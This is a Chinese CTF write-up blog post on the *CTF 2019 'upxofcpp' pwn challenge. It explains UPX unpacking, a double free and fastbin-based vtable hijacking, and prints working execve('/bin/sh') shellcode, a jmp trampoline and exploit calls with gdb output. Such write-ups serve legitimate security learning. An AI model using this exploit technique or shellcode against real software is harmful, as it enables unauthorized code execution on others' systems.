<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,C++ pwn," />










<meta name="description" content="感觉最近有点浮躁，还是要静下心来学习一下上半年的题目，这是一道c++的题目，上午做pwnable.tw上的CAOV被劝退了，这道题虽然是c++写的，但是还是用的malloc和free。这是第二道c++ pwn的题目。">
<meta name="keywords" content="pwn,C++ pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="startctf 2019 upxofcpp">
<meta property="og:url" content="http://x3h1n.github.io/2019/07/16/startctf-2019-upxofcpp/index.html">
<meta property="og:site_name" content="X3h1n">
<meta property="og:description" content="感觉最近有点浮躁，还是要静下心来学习一下上半年的题目，这是一道c++的题目，上午做pwnable.tw上的CAOV被劝退了，这道题虽然是c++写的，但是还是用的malloc和free。这是第二道c++ pwn的题目。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-07-16T14:11:25.886Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="startctf 2019 upxofcpp">
<meta name="twitter:description" content="感觉最近有点浮躁，还是要静下心来学习一下上半年的题目，这是一道c++的题目，上午做pwnable.tw上的CAOV被劝退了，这道题虽然是c++写的，但是还是用的malloc和free。这是第二道c++ pwn的题目。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","3display":"post","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://x3h1n.github.io/2019/07/16/startctf-2019-upxofcpp/"/>





  <title>startctf 2019 upxofcpp | X3h1n</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">X3h1n</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://x3h1n.github.io/2019/07/16/startctf-2019-upxofcpp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="X3h1n">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">startctf 2019 upxofcpp</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-07-16T17:11:03+08:00">
                2019-07-16
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>感觉最近有点浮躁，还是要静下心来学习一下上半年的题目，这是一道c++的题目，上午做pwnable.tw上的CAOV被劝退了，这道题虽然是c++写的，但是还是用的malloc和free。这是第二道c++ pwn的题目。<br><a id="more"></a></p>
<h1 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h1><p>这道题目加了upx的壳:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">ubuntu@ubuntu:~/upx<span class="number">-3.95</span>-amd64_linux$ checksec upxofcpp</span><br><span class="line">[!] Did <span class="keyword">not</span> find any GOT entries</span><br><span class="line">[*] <span class="string">'/home/ubuntu/upx-3.95-amd64_linux/upxofcpp'</span></span><br><span class="line">    Arch:     amd64<span class="number">-64</span>-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br><span class="line">    Packer:   Packed <span class="keyword">with</span> UPX</span><br></pre></td></tr></table></figure></p>
<p>可以下载linux下的upx，链接在<a href="https://github.com/upx/upx/releases/tag/v3.95" target="_blank" rel="noopener">这里</a>，然后使用以下命令进行脱壳，记得给目标文件加可执行权限。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">ubuntu@ubuntu:~/upx-3.95-amd64_linux$ ./upx -d upxofcpp</span><br><span class="line">                       Ultimate Packer for eXecutables</span><br><span class="line">                          Copyright (C) 1996 - 2018</span><br><span class="line">UPX 3.95        Markus Oberhumer, Laszlo Molnar &amp; John Reiser   Aug 26th 2018</span><br><span class="line"></span><br><span class="line">        File size         Ratio      Format      Name</span><br><span class="line">   --------------------   ------   -----------   -----------</span><br><span class="line">     14704 &lt;-      7100   48.29%   linux/amd64   upxofcpp</span><br><span class="line"></span><br><span class="line">Unpacked 1 file.</span><br></pre></td></tr></table></figure></p>
<p>拖到IDA里面可以看到程序功能有4个，add、remove、edit和show，有一个结构体维护每一个申请的heap chunk。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">00000000 node            struc ; (sizeof=0x18, mappedto_9)</span><br><span class="line">00000000 func_ptr        dq ?</span><br><span class="line">00000008 heap_ptr        dq ?</span><br><span class="line">00000010 size            dq ?</span><br><span class="line">00000018 node            ends</span><br><span class="line">00000018</span><br></pre></td></tr></table></figure></p>
<p>这个func_ptr存储了一个函数指针，每个chunk的函数指针都是一样的，指向bss段上的一个虚表，当调用remove进行堆块释放时会有以下调用：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">v1 = *(void (__fastcall **)(void *))(v0-&gt;func_ptr + 8);</span><br></pre></td></tr></table></figure></p>
<p>当调用show功能时会调用虚表里的第三项：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">v1 = *(__int64 (__fastcall **)())(v0-&gt;func_ptr + 16);</span><br></pre></td></tr></table></figure></p>
<p>再看其他的地方无法进行泄露，在add中程序会把输入的每个字符按照每四字节来存储，就比如输入了2个1，它在堆块中存储的是0x00010001。<br>虽然没有泄露，但是如果能将函数指针修改到堆上，然后在堆上布置上shellcode，这样获得shell。看了参考里的第一篇文章才注意到加壳和脱壳后的程序某些段的读写权限是不同的，原始程序使用vmmap命令可以发现heap是rwx：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ vmmap</span><br><span class="line">Start              End                Perm  Name</span><br><span class="line">0x00200000         0x00400000         rwxp  mapped</span><br><span class="line">0x0000555555554000 0x0000555555555000 r-xp  /home/ubuntu/Documents/pwn/2019/starctf/upxofcpp/upxofcpp_unpack</span><br><span class="line">0x0000555555556000 0x0000555555588000 rwxp  [heap]</span><br><span class="line">0x00007ffff6f45000 0x00007ffff6f49000 rwxp  mapped</span><br><span class="line">0x00007ffff6f49000 0x00007ffff6f5f000 r-xp  /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">0x00007ffff6f5f000 0x00007ffff715e000 ---p  /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">0x00007ffff715e000 0x00007ffff715f000 rwxp  /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">0x00007ffff715f000 0x00007ffff7160000 rwxp  mapped</span><br><span class="line">0x00007ffff7160000 0x00007ffff7268000 r-xp  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff7268000 0x00007ffff7467000 ---p  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff7467000 0x00007ffff7468000 r-xp  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff7468000 0x00007ffff7469000 rwxp  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff7469000 0x00007ffff7629000 r-xp  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff7629000 0x00007ffff7829000 ---p  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff7829000 0x00007ffff782d000 r-xp  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff782d000 0x00007ffff782f000 rwxp  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff782f000 0x00007ffff7833000 rwxp  mapped</span><br><span class="line">0x00007ffff7833000 0x00007ffff79a5000 r-xp  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff79a5000 0x00007ffff7ba5000 ---p  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff7ba5000 0x00007ffff7baf000 r-xp  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff7baf000 0x00007ffff7bb1000 rwxp  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff7bb1000 0x00007ffff7bb6000 rwxp  mapped</span><br><span class="line">0x00007ffff7bcf000 0x00007ffff7bf5000 r-xp  /lib/x86_64-linux-gnu/ld-2.23.so</span><br><span class="line">0x00007ffff7bf5000 0x00007ffff7df4000 ---p  mapped</span><br><span class="line">0x00007ffff7df4000 0x00007ffff7df5000 r-xp  /lib/x86_64-linux-gnu/ld-2.23.so</span><br><span class="line">0x00007ffff7df5000 0x00007ffff7df6000 rwxp  /lib/x86_64-linux-gnu/ld-2.23.so</span><br><span class="line">0x00007ffff7df6000 0x00007ffff7df7000 rwxp  mapped</span><br><span class="line">0x00007ffff7df7000 0x00007ffff7dfa000 r-xp  mapped</span><br><span class="line">0x00007ffff7dfa000 0x00007ffff7ff9000 ---p  mapped</span><br><span class="line">0x00007ffff7ff9000 0x00007ffff7ffa000 r-xp  mapped</span><br><span class="line">0x00007ffff7ffa000 0x00007ffff7ffb000 rwxp  mapped</span><br><span class="line">0x00007ffff7ffb000 0x00007ffff7ffd000 r--p  [vvar]</span><br><span class="line">0x00007ffff7ffd000 0x00007ffff7fff000 r-xp  [vdso]</span><br><span class="line">0x00007ffffffde000 0x00007ffffffff000 rwxp  [stack]</span><br><span class="line">0xffffffffff600000 0xffffffffff601000 r-xp  [vsyscall]</span><br></pre></td></tr></table></figure></p>
<p>但是脱壳后的程序的堆没有可执行权限：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ vmmap</span><br><span class="line">Start              End                Perm  Name</span><br><span class="line">0x0000555555554000 0x0000555555557000 r-xp  /home/ubuntu/Documents/pwn/2019/starctf/upxofcpp/upxofcpp</span><br><span class="line">0x0000555555756000 0x0000555555757000 r--p  /home/ubuntu/Documents/pwn/2019/starctf/upxofcpp/upxofcpp</span><br><span class="line">0x0000555555757000 0x0000555555758000 rw-p  /home/ubuntu/Documents/pwn/2019/starctf/upxofcpp/upxofcpp</span><br><span class="line">0x0000555555758000 0x000055555578a000 rw-p  [heap]</span><br><span class="line">0x00007ffff716c000 0x00007ffff7182000 r-xp  /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">0x00007ffff7182000 0x00007ffff7381000 ---p  /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">0x00007ffff7381000 0x00007ffff7382000 rw-p  /lib/x86_64-linux-gnu/libgcc_s.so.1</span><br><span class="line">0x00007ffff7382000 0x00007ffff748a000 r-xp  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff748a000 0x00007ffff7689000 ---p  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff7689000 0x00007ffff768a000 r--p  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff768a000 0x00007ffff768b000 rw-p  /lib/x86_64-linux-gnu/libm-2.23.so</span><br><span class="line">0x00007ffff768b000 0x00007ffff784b000 r-xp  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff784b000 0x00007ffff7a4b000 ---p  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff7a4b000 0x00007ffff7a4f000 r--p  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff7a4f000 0x00007ffff7a51000 rw-p  /lib/x86_64-linux-gnu/libc-2.23.so</span><br><span class="line">0x00007ffff7a51000 0x00007ffff7a55000 rw-p  mapped</span><br><span class="line">0x00007ffff7a55000 0x00007ffff7bc7000 r-xp  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff7bc7000 0x00007ffff7dc7000 ---p  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff7dc7000 0x00007ffff7dd1000 r--p  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff7dd1000 0x00007ffff7dd3000 rw-p  /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21</span><br><span class="line">0x00007ffff7dd3000 0x00007ffff7dd7000 rw-p  mapped</span><br><span class="line">0x00007ffff7dd7000 0x00007ffff7dfd000 r-xp  /lib/x86_64-linux-gnu/ld-2.23.so</span><br><span class="line">0x00007ffff7fd9000 0x00007ffff7fdf000 rw-p  mapped</span><br><span class="line">0x00007ffff7ff8000 0x00007ffff7ffa000 r--p  [vvar]</span><br><span class="line">0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp  [vdso]</span><br><span class="line">0x00007ffff7ffc000 0x00007ffff7ffd000 r--p  /lib/x86_64-linux-gnu/ld-2.23.so</span><br><span class="line">0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p  /lib/x86_64-linux-gnu/ld-2.23.so</span><br><span class="line">0x00007ffff7ffe000 0x00007ffff7fff000 rw-p  mapped</span><br><span class="line">0x00007ffffffde000 0x00007ffffffff000 rw-p  [stack]</span><br><span class="line">0xffffffffff600000 0xffffffffff601000 r-xp  [vsyscall]</span><br></pre></td></tr></table></figure></p>
<p>但是在调试中，未脱壳的程序不能调试堆，脱壳后的程序可以查看堆的分布，因此可以先在脱壳后的程序中进行调试，然后在原始程序里触发。</p>
<p>因为需要修改函数指针到堆上，虽然我们不能泄露堆地址，但是我们那可以利用fastbin中的fd和bk来写入堆地址。这个利用想法很好，和之前做某道题目利用unsortedbin chunk的申请和释放来写入prev_size有相同之处。</p>
<p>对了，这道题还有double free，因为在free时没有清空全局的heap_list，可以多次释放。</p>
<h1 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h1><p>这里的调试过程中gdb中的内容都是基于脱壳后的程序进行的。<br>首先申请7个chunk，后面需要利用fastbin的fd来修改func，为了方便在每个chunk中都布置上get shell的shellcode，因为程序特殊的输入方式，需要先提前处理一下shellcode，四个字节作为一组。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">shellcode =<span class="string">""</span></span><br><span class="line">   shellcode += <span class="string">"\x31\xf6\x48\xbb\x2f\x62\x69\x6e"</span></span><br><span class="line">   shellcode += <span class="string">"\x2f\x2f\x73\x68\x56\x53\x54\x5f"</span></span><br><span class="line">   shellcode += <span class="string">"\x6a\x3b\x58\x31\xd2\x0f\x05\x0a"</span></span><br><span class="line"></span><br><span class="line">content=[]</span><br><span class="line">   <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(shellcode),<span class="number">4</span>):</span><br><span class="line">    </span><br><span class="line">       content.append(u32(shellcode[i:i+<span class="number">4</span>].ljust(<span class="number">4</span>,<span class="string">'\x00'</span>)))</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="number">6</span>,content)</span><br><span class="line">add(<span class="number">2</span>,<span class="number">6</span>,content)</span><br><span class="line">add(<span class="number">3</span>,<span class="number">6</span>,content)</span><br><span class="line">add(<span class="number">4</span>,<span class="number">6</span>,content)</span><br><span class="line">add(<span class="number">5</span>,<span class="number">6</span>,content)</span><br><span class="line">add(<span class="number">6</span>,<span class="number">6</span>,content)</span><br><span class="line">add(<span class="number">7</span>,<span class="number">6</span>,content)</span><br></pre></td></tr></table></figure></p>
<p>释放idx3和idx2：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">remove(<span class="number">3</span>)</span><br><span class="line">remove(<span class="number">2</span>)</span><br></pre></td></tr></table></figure></p>
<p>此时fastbin中的状态是如下，在释放时是先释放数据域的chunk，然后再释放存储node结构体的chunk。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ heapinfo</span><br><span class="line">(0x20)     fastbin[0]: 0x555555769c50 --&gt; 0x555555769c70 --&gt; 0x555555769c90 --&gt; 0x555555769cb0 --&gt; 0x0</span><br><span class="line">(<span class="number">0x30</span>)     fastbin[<span class="number">1</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0x40</span>)     fastbin[<span class="number">2</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0x50</span>)     fastbin[<span class="number">3</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0x60</span>)     fastbin[<span class="number">4</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0x70</span>)     fastbin[<span class="number">5</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0x80</span>)     fastbin[<span class="number">6</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0x90</span>)     fastbin[<span class="number">7</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0xa0</span>)     fastbin[<span class="number">8</span>]: <span class="number">0x0</span></span><br><span class="line">(<span class="number">0xb0</span>)     fastbin[<span class="number">9</span>]: <span class="number">0x0</span></span><br><span class="line">                  top: <span class="number">0x555555769dd0</span> (size : <span class="number">0x20230</span>) </span><br><span class="line">       last_remainder: <span class="number">0x0</span> (size : <span class="number">0x0</span>) </span><br><span class="line">            unsortbin: <span class="number">0x0</span></span><br></pre></td></tr></table></figure></p>
<p>此时如果再申请一个chunk，将其索引设置为idx8，这里idx8那么idx8的node结构体部分地址为0x555555769c50，数据存储地址为0x555555769c70。将idx8作为一个跳板，跳转到写有shellcode的地址上去执行，因为后面是调用show函数进行触发的，show函数是函数调用表的第三项，函数调用表的起始地址肯定是被改写为堆块的起始地址，那么偏移0x10处就是fd所在的部分，也是一个堆块的起始地址，根据堆的复用也是上一个堆块的数据域，只有0x8的大小，shellcode的长度为48字节放不下，因此用一个跳转地址，跳转到一个写好shellcode的chunk中去执行。</p>
<p>先把后面exp的部分贴出来，然后一起分析：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">jmp=<span class="string">"\x90"</span>*<span class="number">0x10</span>+<span class="string">"\xeb\x6e\x00\x00"</span></span><br><span class="line">content=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(jmp),<span class="number">4</span>):</span><br><span class="line">    content.append(u32(jmp[i:i+<span class="number">4</span>].ljust(<span class="number">4</span>,<span class="string">'\x00'</span>)))</span><br><span class="line">add(<span class="number">8</span>,<span class="number">6</span>,content+[<span class="number">0xffffffff</span>])</span><br><span class="line">remove(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">##trigger</span></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">p.interactive()</span><br><span class="line">~~~python</span><br><span class="line">在触发之前下断点，最后释放了idx1，fastbin的分布如下：</span><br></pre></td></tr></table></figure></p>
<p>gdb-peda$ heapinfo<br>(0x20)     fastbin[0]: 0x555555769c10 –&gt; 0x555555769c30 –&gt; 0x555555769c90 –&gt; 0x555555769cb0 –&gt; 0x0<br>(0x30)     fastbin[1]: 0x0<br>(0x40)     fastbin[2]: 0x0<br>(0x50)     fastbin[3]: 0x0<br>(0x60)     fastbin[4]: 0x0<br>(0x70)     fastbin[5]: 0x0<br>(0x80)     fastbin[6]: 0x0<br>(0x90)     fastbin[7]: 0x0<br>(0xa0)     fastbin[8]: 0x0<br>(0xb0)     fastbin[9]: 0x0<br>                  top: 0x555555769dd0 (size : 0x20230)<br>       last_remainder: 0x0 (size : 0x0)<br>            unsortbin: 0x0<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">此时show(1)的话，node结构体里func_ptr指向的虚表的地址是0x555555769c30，虚表的内容如下：</span><br><span class="line">~~~python</span><br><span class="line">gdb-peda$ x /8gx 0x0000555555769c30</span><br><span class="line">0x555555769c30: 0x0000000000000006  0x0000000000000021</span><br><span class="line">0x555555769c40: 0x0000555555769c90  0x5f54535668732f2f</span><br><span class="line">0x555555769c50: 0x0a050fd231583b6a  0x0000000000000021</span><br><span class="line">0x555555769c60: 0x0000555555756db8  0x0000555555769c80</span><br></pre></td></tr></table></figure></p>
<p>调用的是偏移0x10处的函数，函数地址是0x0000555555769c90，这个地址处就是我们刚刚申请的idx8的数据域，里面写了一个跳板：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x /i <span class="number">0x0000555555769c90</span></span><br><span class="line"><span class="number">0x555555769c90</span>:  jmp    <span class="number">0x555555769d00</span></span><br></pre></td></tr></table></figure></p>
<p>然后跳转到0x555555769d00地址处执行shellcode,然后get shell。<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ x /<span class="number">10</span>i <span class="number">0x555555769d00</span></span><br><span class="line">   <span class="number">0x555555769d00</span>:  xor    esi,esi</span><br><span class="line">   <span class="number">0x555555769d02</span>:  movabs rbx,<span class="number">0x68732f2f6e69622f</span></span><br><span class="line">   <span class="number">0x555555769d0c</span>:  push   rsi</span><br><span class="line">   <span class="number">0x555555769d0d</span>:  push   rbx</span><br><span class="line">   <span class="number">0x555555769d0e</span>:  push   rsp</span><br><span class="line">   <span class="number">0x555555769d0f</span>:  pop    rdi</span><br><span class="line">   <span class="number">0x555555769d10</span>:  push   <span class="number">0x3b</span></span><br><span class="line">   <span class="number">0x555555769d12</span>:  pop    rax</span><br><span class="line">   <span class="number">0x555555769d13</span>:  xor    edx,edx</span><br><span class="line">   <span class="number">0x555555769d15</span>:  syscall</span><br></pre></td></tr></table></figure></p>
<p>跳板指令是’\xeb\x6e’，因为是近跳转，指令长度为2个字节，偏移是0x555555769d00-0x555555769c90+2=0x6e。</p>
<p>关于完整的exp是复现的<a href="https://github.com/ray-cp/ctf-pwn/blob/master/2019/starctf2019/upxofcpp/exp.py" target="_blank" rel="noopener">这篇exp</a>，利用非常巧妙。</p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://ray-cp.github.io/archivers/STARCTF_2019_PWN_WRITEUP" target="_blank" rel="noopener">https://ray-cp.github.io/archivers/STARCTF_2019_PWN_WRITEUP</a></p>
<p><a href="https://blog.rois.io/2019/starctf-2019-writeup/" target="_blank" rel="noopener">https://blog.rois.io/2019/starctf-2019-writeup/</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
            <a href="/tags/C-pwn/" rel="tag"># C++ pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
